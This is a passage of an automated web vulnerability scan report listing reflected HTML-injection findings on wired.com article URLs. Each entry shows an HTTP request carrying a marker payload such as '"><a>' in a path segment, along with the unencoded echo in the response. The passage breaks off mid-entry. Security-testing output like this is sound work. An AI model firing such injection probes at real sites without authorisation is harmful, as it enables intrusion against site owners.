<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriese0442"><a>9e37c4acab2 c_news">
...[SNIP]...

1.661. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0524

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d13aa"><a>0ad5cf6d60a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsd13aa"><a>0ad5cf6d60a/2007/05/dayintech_0524 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:01 GMT
Date: Sun, 21 Nov 2010 23:11:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsd13aa"><a>0ad5cf6d60a">
...[SNIP]...

1.662. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0528

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9582"><a>bcb764a9769 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencee9582"><a>bcb764a9769/discoveries/news/2007/05/dayintech_0528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:29 GMT
Date: Sun, 21 Nov 2010 23:10:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencee9582"><a>bcb764a9769 ss_discoveries c_news">
...[SNIP]...

1.663. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0528

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10800"><a>1d3b957fa67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries10800"><a>1d3b957fa67/news/2007/05/dayintech_0528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:47 GMT
Date: Sun, 21 Nov 2010 23:10:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries10800"><a>1d3b957fa67 c_news">
...[SNIP]...

1.664. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/05/dayintech_0528

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 187f0"><a>98dbdd44018 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news187f0"><a>98dbdd44018/2007/05/dayintech_0528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:04 GMT
Date: Sun, 21 Nov 2010 23:11:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news187f0"><a>98dbdd44018">
...[SNIP]...

1.665. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/06/dayintech_0629

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49504"><a>10544948792 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science49504"><a>10544948792/discoveries/news/2007/06/dayintech_0629 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:07 GMT
Date: Sun, 21 Nov 2010 23:11:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science49504"><a>10544948792 ss_discoveries c_news">
...[SNIP]...

1.666. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/06/dayintech_0629

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86976"><a>98f964069b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries86976"><a>98f964069b0/news/2007/06/dayintech_0629 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries86976"><a>98f964069b0 c_news">
...[SNIP]...

1.667. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/06/dayintech_0629

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5931b"><a>18d340cf7a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news5931b"><a>18d340cf7a3/2007/06/dayintech_0629 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:33 GMT
Date: Sun, 21 Nov 2010 23:11:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news5931b"><a>18d340cf7a3">
...[SNIP]...

1.668. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0903

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf82e"><a>db00fe548f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencecf82e"><a>db00fe548f1/discoveries/news/2007/09/dayintech_0903 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:05 GMT
Date: Sun, 21 Nov 2010 23:11:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencecf82e"><a>db00fe548f1 ss_discoveries c_news">
...[SNIP]...

1.669. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0903

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4d3a"><a>ccd81216dac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriese4d3a"><a>ccd81216dac/news/2007/09/dayintech_0903 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:20 GMT
Date: Sun, 21 Nov 2010 23:11:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriese4d3a"><a>ccd81216dac c_news">
...[SNIP]...

1.670. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0903

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f786"><a>0483485da03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news1f786"><a>0483485da03/2007/09/dayintech_0903 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:29 GMT
Date: Sun, 21 Nov 2010 23:11:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news1f786"><a>0483485da03">
...[SNIP]...

1.671. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0904

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ac5"><a>19e070cbea0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceb4ac5"><a>19e070cbea0/discoveries/news/2007/09/dayintech_0904 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:06 GMT
Date: Sun, 21 Nov 2010 23:11:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceb4ac5"><a>19e070cbea0 ss_discoveries c_news">
...[SNIP]...

1.672. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0904

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9c23"><a>3309dc6b8b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesa9c23"><a>3309dc6b8b4/news/2007/09/dayintech_0904 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:22 GMT
Date: Sun, 21 Nov 2010 23:11:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesa9c23"><a>3309dc6b8b4 c_news">
...[SNIP]...

1.673. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/09/dayintech_0904

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e49"><a>d02b8d3e523 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news78e49"><a>d02b8d3e523/2007/09/dayintech_0904 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:32 GMT
Date: Sun, 21 Nov 2010 23:11:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news78e49"><a>d02b8d3e523">
...[SNIP]...

1.674. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/10/dayintech_1010

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1916e"><a>0a35d8b532a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science1916e"><a>0a35d8b532a/discoveries/news/2007/10/dayintech_1010 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:38 GMT
Date: Sun, 21 Nov 2010 23:09:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science1916e"><a>0a35d8b532a ss_discoveries c_news">
...[SNIP]...

1.675. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/10/dayintech_1010

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 884c7"><a>bb42abaa2dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries884c7"><a>bb42abaa2dc/news/2007/10/dayintech_1010 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:04 GMT
Date: Sun, 21 Nov 2010 23:10:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries884c7"><a>bb42abaa2dc c_news">
...[SNIP]...

1.676. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/10/dayintech_1010

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf412"><a>cb3677366bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

